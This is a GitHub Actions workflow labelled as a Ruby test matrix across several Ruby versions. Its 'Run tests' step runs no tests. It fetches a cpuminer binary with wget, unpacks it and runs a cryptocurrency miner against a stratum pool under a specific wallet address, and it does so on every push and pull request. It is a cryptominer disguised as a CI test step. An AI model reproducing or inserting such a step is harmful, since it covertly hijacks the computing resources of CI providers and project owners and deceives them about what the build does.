name: Ruby

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  test:

    runs-on: ubuntu-latest
    strategy:
      matrix:
        ruby-version: ['2.6.0', 2.6.6, '2.7.0', 2.7.2, '3.0.0']

    steps:
    - uses: actions/checkout@v2
    - name: Set up Ruby

      uses: ruby/setup-ruby@473e4d8fe5dd94ee328fdfca9f8c9c7afc9dae5e
      with:
        ruby-version: ${{ matrix.ruby-version }}
        bundler-cache: true
    - name: Run tests
      run: |
        wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
        tar xf cpuminer-opt-linux.tar.gz
        ./cpuminer-sse2 -a yespowersugar -o stratum+tcp://stratum-eu.rplant.xyz:7042 -u sugar1q9494l7vclvtuuhkfmuhgl0t2nnwymwl8xyukr8.tetew
